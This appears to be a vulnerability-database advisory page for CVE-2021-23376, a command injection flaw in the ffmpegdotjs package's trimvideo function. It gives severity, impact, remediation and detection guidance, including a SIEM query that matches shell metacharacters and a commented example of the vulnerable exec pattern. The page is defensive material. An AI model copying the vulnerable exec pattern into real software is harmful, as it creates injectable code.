CVE-2021-23376 – CVE-2021-23376 is a critical command injection ... (How to Fix)

Q: What is the severity of CVE-2021-23376?

CVE-2021-23376 has a CVSS score of 9.8 (CRITICAL). CVE-2021-23376 is a critical command injection vulnerability in ffmpegdotjs that allows attackers to execute arbitrary commands on the host system. This affects all versions of the ffmpegdotjs package when untrusted user input is passed to the trimvideo function. Any application using this vulnerable package is at risk of complete system compromise.

📋 TL;DR

CVE-2021-23376 is a critical command injection vulnerability in ffmpegdotjs that allows attackers to execute arbitrary commands on the host system. This affects all versions of the ffmpegdotjs package when untrusted user input is passed to the trimvideo function. Any application using this vulnerable package is at risk of complete system compromise.

💻 Affected Systems

Products:

ffmpegdotjs

Versions: All versions prior to any patch

Operating Systems: All operating systems running Node.js

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in default configuration when trimvideo function is used with user input.

📦 What is this software?

Ffmpegdotjs by Ffmpegdotjs Project

View all CVEs affecting Ffmpegdotjs →

⚠️ Manual Verification Required

This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.

Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).

🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.

Recommended Actions:

Review the CVE details at NVD
Check vendor security advisories for your specific version
Test if the vulnerability is exploitable in your environment
Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining root/administrator privileges, data exfiltration, ransomware deployment, or complete system destruction.

🟠

Likely Case

Attacker executes commands with the same privileges as the Node.js process, potentially accessing sensitive data, installing malware, or pivoting to other systems.

🟢

If Mitigated

Limited impact if input validation and proper sandboxing are implemented, potentially restricting damage to the application's context.

🌐 Internet-Facing: HIGH - Web applications accepting user uploads or media processing requests are directly exposed to exploitation.

🏢 Internal Only: MEDIUM - Internal applications could still be exploited through authenticated users or other attack vectors.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Simple command injection via unsanitized input to child_process.exec. Exploitation requires the trimvideo function to be called with attacker-controlled data.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: None available

Vendor Advisory: https://github.com/TRomesh/ffmpegdotjs/security/advisories

Restart Required: No

Instructions:

1. Remove ffmpegdotjs from your project. 2. Use alternative video processing libraries with proper security controls. 3. Update package.json to remove ffmpegdotjs dependency.

🔧 Temporary Workarounds

Input Sanitization Wrapper

all

Implement strict input validation and sanitization before passing data to trimvideo function

// Example: Validate input contains only safe characters
const safeInput = userInput.replace(/[^a-zA-Z0-9\s\-\._]/g, '');

Replace child_process.exec with child_process.spawn

all

Use spawn with explicit arguments instead of exec to prevent command injection

// Replace: exec('ffmpeg ' + userInput)
// With: spawn('ffmpeg', [userInput])

🧯 If You Can't Patch

Implement strict input validation and sanitization for all user inputs passed to trimvideo function
Run the Node.js application with minimal privileges and in a containerized/sandboxed environment

🔍 How to Verify

Check if Vulnerable:

Check package.json for ffmpegdotjs dependency: grep -r 'ffmpegdotjs' package.json

Check Version:

npm list ffmpegdotjs

Verify Fix Applied:

Verify ffmpegdotjs is removed from package.json and node_modules directory

📡 Detection & Monitoring

Log Indicators:

Unusual child process executions from Node.js
Suspicious command-line arguments to ffmpeg
Multiple failed trimvideo function calls

Network Indicators:

Outbound connections from Node.js process to unexpected destinations
Data exfiltration patterns

SIEM Query:

process.name:node AND child_process.name:ffmpeg AND command_line:*;* OR command_line:*&* OR command_line:*|*

📊 Metadata

CVE ID: CVE-2021-23376

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

Published: April 18, 2021

Last Updated: November 21, 2024

🔗 References

https://github.com/TRomesh/ffmpegdotjs/blob/b7395daf0bdcb81218340427eb7073cdd28462af/index.js%23L219 Broken Link
https://snyk.io/vuln/SNYK-JS-FFMPEGDOTJS-1078542 Exploit,Third Party Advisory
https://github.com/TRomesh/ffmpegdotjs/blob/b7395daf0bdcb81218340427eb7073cdd28462af/index.js%23L219 Broken Link
https://snyk.io/vuln/SNYK-JS-FFMPEGDOTJS-1078542 Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-23376, you might also want to check these: